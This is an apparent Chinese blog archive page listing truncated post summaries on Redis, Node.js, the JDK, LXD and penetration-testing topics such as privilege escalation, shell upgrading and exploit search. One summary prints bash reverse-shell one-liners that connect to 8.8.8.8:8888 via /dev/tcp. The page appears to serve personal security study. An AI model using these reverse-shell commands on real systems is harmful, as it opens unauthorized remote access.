04 2022 档案
摘要:redis-cli 命令总结 Redis提供了丰富的命令(command)对数据库和各种数据类型进行操作,这些command可以在Linux终端使用。在编程时,比如使用Redis 的Java语言包,这些命令都有对应的方法。下面将Redis提供的命令做一总结。 1、连接操作相关的命令 · quit:关
阅读全文
摘要:需要用到npm,发现直接apt install nodejs会有很多不便,于是采用二进制包+软链接的方法。 如果已经使用apt install nodejs安装过,可以使用apt remove nodejs卸载 安装 1、下载 方法一:去官网下载后传到Linux系统中 Download | Node
阅读全文
摘要:jdk8与jdk11共存,各自启动对应的java程序 由于已经安装了jdk8,但有些java程序,比如新版Burp需要jdk11以上版本才能正常运行 对于这种情况,怎么样让jdk8与jdk11成为一个问题,网上有比较多的方法,都是大差不差的,都是各自启动对于的java程序。 只不过在配置的时候会出现
阅读全文
摘要:lxd和lxc Linux Container(LXC)通常被认为是一种轻量级虚拟化技术,它介于Chroot和完整开发的虚拟机之间,LXC可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源。 Linux Daemon(LXD)是一个轻量级容器管理程序,而LXD是基于L
阅读全文
摘要:整理了渗透相关书籍并列举出来,此举主要的目的是督促自己,同时与诸君分享
阅读全文
摘要:搜索漏洞 浏览器 在google或其搜索引擎进行搜索:<service_name> [version] exploit 还可以在https://exploits.shodan.io进行搜索。 Searchsploit 在kali的控制台上搜索 #Searchsploit tricks searchs
阅读全文
摘要:升级远程 shell(仅限 Unix 机器) https://netsec.ws/?p=337 通常,在通过 nc 捕获 shell 之后,会在一个功能非常有限的 shell 中。例如没有命令历史记录(并使用向上“”和“向下”箭头循环浏览它们)和文件名称、命令自动完成等。在缺少这些功能的 shell
阅读全文
摘要:提权概念 特权升级有两种类型:水平和垂直。在水平升级中,您从一个用户转移到 另一个用户。在这种情况下,两个用户都是通用的,而在垂直方式中,我们将特权从普通用户提升为管理员。 用户无法访问(读取/写入/执行)不允许访问的文件。但是,超级用户 (root)可以访问系统上存在的所有文件。为了更改任何重要的
阅读全文
摘要:反弹shell IP:8.8.8.8 Port:8888 Bash TCP Victim bash -c 'exec bash -i &>/dev/tcp/8.8.8.8/8888 <&1' bash -i >& /dev/tcp/8.8.8.8/8888 0>&1 /bin/bash -i > /
阅读全文
摘要:Linux提权 本项目用来记录自己在Linux提权过程中遇到的一些内容,包括提权方法提权工具等。Linux提权在后渗透过程中也较为重要,因为我们将会在此仓库持续更新Linux提权的相关内容!提权有风险,提权需谨慎。不到非提不可的情况下千万不要尝试提权! 作者:0e0w 01-Linux提权基础知识
阅读全文
摘要:command 收集渗透中会用到的常用命令 。 更新时间:2022.2.27 Table of Contents command nmap 存活主机 bypass gobuster dirsearch nbtscan 代理工具 ssh grep mysql sqlmap hydra medusa p
阅读全文
浙公网安备 33010602011771号